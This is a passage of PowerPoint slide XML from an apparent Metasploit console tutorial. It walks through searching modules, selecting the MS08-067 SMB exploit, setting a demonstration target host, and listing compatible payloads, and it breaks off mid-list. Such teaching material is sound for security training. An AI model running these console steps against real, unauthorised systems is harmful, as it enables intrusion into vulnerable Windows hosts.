              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Keywords:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15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500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> app      :  Modules that are client or server attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15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500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> author   :  Modules written by this author</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15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500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> bid      :  Modules with a matching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Bugtraq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15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500" b="1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500" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>cve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      :  Modules with a matching CVE ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15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500" b="1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500" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>edb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>      :  Modules with a matching Exploit-DB ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15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500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> name     :  Modules with a matching descriptive name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15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500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> platform :  Modules affecting this platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15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500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1" dirty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dirty="0" smtClean="0"/>
              <a:t>Okay, let’s try that “type” option to narrow it down to exploits.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68619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MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Console - Navigation (continued)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061032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Let’s look for just ”exploits”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>msf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 &gt; search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>type:exploit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400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Matching Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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================</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:b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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:b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   Name                                            Disclosure Date  Rank       Description  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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   ----                                            ---------------  ----       -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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   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exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>linux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/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>chain_reply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400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Corrupti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...     2010-06-16       good       Samba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>chain_reply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 Mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a: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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" b="1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dirty="0" smtClean="0"/>
              <a:t>Getting better, but still too many options.  We know it’s for Windows, so let’s narrow down further!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6971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MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Console - Navigation (continued)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061032" cy="435133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Let’s look for just ”exploits” that are effective against Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>msf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 &gt; search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>type:exploit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400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>platform:windows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400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Matching Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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================</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:b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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:b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   Name                                            Disclosure Date  Rank       Description  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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   ----                                            ---------------  ----       -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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   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exploit/multi/http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>struts_code_exec_classloader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 2014-03-06       manual     Apache Struts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>ClassLo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a: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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" b="1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dirty="0" smtClean="0"/>
              <a:t>That “multi” is interesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> means it applies to multiple platforms, so it matched here.  More refinement.  Wait a moment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> didn’t we say that MS08-067 was CVE-2008-4250?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1584954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MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Console - Navigation (continued)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061032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Let’s look just for exploits that match that vulnerability:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>msf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 &gt; search cve:2008-4250</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Matching Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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================</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:b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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:b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   Name                                            Disclosure Date  Rank       Description  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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   ----                                            ---------------  ----       -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>   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exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>smb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/ms08_067_netapi Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Corr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> 2008-10-28       great      MS08-067 Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" b="1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dirty="0" smtClean="0"/>
              <a:t>Only one match!  Perfect!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="963842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MSF Console - Using Exploits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Now that we’ve found an exploit, let’s “use” it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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msf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&gt; use exploit/windows/</a:t>
            </a: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smb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/ms08_067_netapi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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msf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exploit(ms08_067_netapi)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&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1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dirty="0" smtClean="0"/>
              <a:t>Notice that the prompt has updated to show what exploit is selected. Let’s learn more about this exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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msf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exploit(ms08_067_netapi) &gt;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info</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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       Name : MS08-067 Microsoft Server Service Relative Path Stack Corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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    Module : exploit/windows/</a:t>
            </a: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smb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/ms08_067_netapi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  Platform : Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Privileged : Yes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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{</a:t>
            </a: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etc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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea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3993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MSF Console - Using Exploits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Scrolling down on that we can see several interesting sections:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payload Constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Targets allows us to manually specify what our target system is, or to use automatic targeting (normally the default) if we don’t know.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Options allows us to specify exploit-specific options.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payload constraints is what lets MSF automatically choose which payload options are viable for this exploit.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606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MSF Console - Using Exploits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Let’s set some options.  We can see a concise summary of what options are available by using the “show” command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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msf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exploit(ms08_067_netapi) &gt; show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Module Options (exploit/windows/</a:t>
            </a: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smb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/ms08_067_netapi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):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 Name     Current Setting  Required  Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 ----     ---------------  --------  -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 RHOST                     yes       The target address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 RPORT    445              yes       The SMB service port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Exploit target:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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  Id  Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 --  ----</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 0   Automatic Targeting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1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dirty="0" smtClean="0"/>
              <a:t>Okay, so we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>can set a few things, including the target host and port, and what to target.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6613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MSF Console - Using Exploits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We’ll leave the port set to the default, but we need to set the host that we’ll target.  For this demonstration we’ll use 10.20.30.100 as that address:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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msf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exploit(ms08_067_netapi) &gt;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set RHOST 10.20.30.100</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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RHOST =&gt; 10.20.30.100</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>That’s all we need to set.  On to choosing a payload!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0052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MSF Console - Using Exploits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Let’s see what payloads are supported for this particular exploit:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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msf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exploit(ms08_067_netapi) &gt; show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payloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Compatible Payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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===================</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 Name                            Disclosure Date  Rank    Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 ----                            ---------------  ----    -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 generic/custom                                   normal  Custom Payload</a:t>
